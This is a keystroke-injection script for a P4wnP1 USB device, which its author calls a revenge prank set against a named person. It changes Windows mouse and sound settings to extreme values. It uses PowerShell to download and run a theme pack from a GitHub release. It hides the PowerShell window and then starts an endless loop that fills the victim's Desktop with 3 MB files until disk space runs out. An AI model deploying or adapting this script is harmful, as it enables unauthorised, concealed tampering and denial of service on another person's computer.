/*////////////////////////////////////////////////////
Yes, this set is part of my revenge agaist Jerem Vol.0
Most Wanted
////////////////////////////////////////////////////*/

/*////////////////////////////////////////////////////
SET GLOBALCONFIG
////////////////////////////////////////////////////*/
layout('fr');
hide=true;
typingSpeed(50,100)

/*////////////////////////////////////////////////////
Yes, this set is part of my revenge agaist Jerem Vol.2
Fat Mouse
////////////////////////////////////////////////////*/
press("GUI");
delay(500);
type("Paramètres de la Souris")
delay(500);
press("ENTER");
delay(500);
press("DOWN");
delay(300);
press("TAB");
delay(200);
press("TAB");
delay(200);
typingSpeed(0,0)
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
typingSpeed(50,100)
delay(300);
press("TAB");
delay(200);
press("TAB");
delay(200);
press("ENTER");
delay(300);
typingSpeed(0,0)
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
delay(200);
typingSpeed(50,100)
press("TAB");
delay(200);
press("RIGHT");
press("RIGHT");
press("RIGHT");
delay(300);
press("ENTER");
delay(500);
press("TAB");
delay(200);
press("RIGHT");
delay(200);
press("RIGHT");
delay(200);
press("RIGHT");
delay(300);
press("ENTER");
press("ALT F4");
/*////////////////////////////////////////////////////
Yes, this set is part of my revenge agaist Jerem Vol.4
Full Sound
////////////////////////////////////////////////////*/
press("GUI");
delay(400);
type("Paramètres de son")
delay(500);
press("ENTER");
delay(400);
press("TAB");
delay(200);
press("TAB");
delay(200);
press("TAB");
delay(200);
typingSpeed(10,10);
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
press("RIGHT");
typingSpeed(50,100);
delay(400);
press("ALT F4");
/*////////////////////////////////////////////////////
Yes, this set is part of my revenge agaist Jerem Vol.5
Ugly Theme
////////////////////////////////////////////////////*/
press("GUI r");
delay(500);
type("powershell");
delay(300);
press("ENTER");
delay(300);
typingSpeed(10,10);
type('Invoke-WebRequest -Uri "https://github.com/MrNonoss/P4wnp1_Prank/releases/download/V2/JeremPrankV2.deskthemepack" -OutFile "jeremPrank.deskthemepack" ; ./jeremPrank.deskthemepack');
typingSpeed(50,100);
delay(500);
press("ENTER");
delay(10000);
type("exit");
delay(300);
press("ENTER");
delay(300);
press("ALT F4");
delay(600);
/*////////////////////////////////////////////////////
Yes, this set is part of my revenge agaist Jerem Vol.6
Burst files
////////////////////////////////////////////////////*/
// Open an interactive admin PowerShell console
press("GUI r");
delay(500);
type("powershell");
delay(400);
press("ENTER");
delay(300);
typingSpeed(10,10);
// Hide an already opened PowerShell console, but keep input focus, to gon on typing
type('$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,100,100,16512)');
delay(300);
press("ENTER");
delay(500);
type('$name = 0 ; While($true) {$name++ ; fsutil file createnew "Desktop\\do_Not_Fuck_With_Me.$name" 3000000}');
typingSpeed(50,100);
delay(300);
press("ENTER");
